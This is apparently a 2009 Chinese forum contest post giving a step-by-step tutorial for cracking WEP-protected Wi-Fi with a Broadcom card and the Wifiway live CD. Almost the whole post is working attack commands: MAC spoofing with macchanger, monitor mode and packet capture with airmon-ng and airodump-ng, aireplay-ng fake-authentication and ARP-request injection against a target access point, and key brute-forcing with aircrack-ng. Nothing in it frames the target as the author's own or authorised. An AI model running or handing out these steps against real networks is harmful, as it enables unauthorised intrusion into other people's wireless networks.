0556 发表于 2009-9-22 10:50:26

参赛帖BROADCOM 802.11 B/G破 wep 实战

在VM下用BT2破wep没有意义,airdrack-ng要升级,能上网升级还破wep玩?有病呀?Wifiway0.8用airoway.sh破wep够简洁,可惜只能intel3945,事实上,wifiway0.8支持broadcom比3945好,只是,airoway.sh默认的接口和broadcom不一样而已,
下面,手动搞定。我的东东:我的本本,旭日467a,网卡,broadcom802.11b/g ,用的是wifi 0.8 ,纯的,不是虚拟机,ap是tp-link
放入光盘,一路回车,进
Wiaiway#
Wiaiway# startx
进图形界面
下面开始
1,
Wifiway#:ifconfig -a 察看当前网卡
Iwconfig 察看当前无线网卡
我的是eth1 ,有时是eth0
2
先将MAC地址修改成需伪造的任意MAC地址,
Wifiway#:macchanger –m 00:11:22:33:44:55 eth1
-m后跟要伪造的MAC,之后再跟要修改的网卡名即可,这里我们将该网卡MAC修改成00:11:22:33:44:55,
3
然后再载入网卡,输入:
Wifiway#:ifconfig -a eth1 up来载入网卡驱动
4
然后,我们需要将网卡激活成monitor模式
Wifiway#:airmon-ng start eth1
这里没有通道号, 如果知道通道号,这一步可不做。
下来,我们可以使用Kismet、来扫描当前无线网络的AP,
记下目标资料。1通道号,2mac,3名称
关闭monitor
Wifiway#:airmon-ng stop eth1
重开,加通道号,比如是 ch 是6 这里只监视通道6
Wifiway#: airmon-ng start eth1 6
5
开始抓包
Wifiway#:airodump-ng -w aaa --channel 6 eth1
这里aaa就是我设置的抓包文件名
6,
另开一窗口,(第二个窗口)就可以进行FakeAuth攻击,这种攻击就是专门在预攻击无线接入点AP没有客户端活动甚至不存在Client的情况下使用的。具体命令如下:
Wifiway#:ireplay-ng -1 1 -e AP’s ESSID -a AP’s MAC -h FakeMAC eth1
这里-1指的就是采用FakeA uth攻击模式,后面跟延迟;-e后面跟AP的ESSID,也就是ap名称-a后面设置AP的MAC,-h后面则是前面伪造的MAC,最后是无线网卡。
7,
与此同时,为了IVs(初始化向量)的获取,ArpRequest注入式攻击,可以有效提高抓包数量及破解速度,命令如下
Wifiway#:aireplay-ng -3 -b AP's MAC -h Client's MAC -x 1024 eth1
解释一下:-3指的是采取ArpRequest注入攻击方式,-b后面跟上要入侵的AP的MAC地址,-h后面跟的是监测到的客户端MAC地址,这里我们使用刚才伪造的客户端MAC,如上图中显示的,至于-x 1024指的是定义每秒发送数据包数量,这个值可以小一些,但最高1024就可以了,这里我使用默认,最后是指定无线网卡
可以看到,ARPrequest注入攻击非常有效,会发现数据包的数量递增加快。
8,
看到date到5万,就可以同步开启aircrack-ng来进行同步破解了,
再开一窗口,(第三个窗口)
Wifiway#:Ls
可以看到aaa-01.cap,这就是我们抓的包,
Wifiway#:aircrack-ng -x -f 2 aaa-01.cap
这里-x是暴力破解模式,-f指的是启用密码复杂度为2 ,后面是我们即时保存包文件
页: [1]
查看完整版本: 参赛帖BROADCOM 802.11 B/G破 wep 实战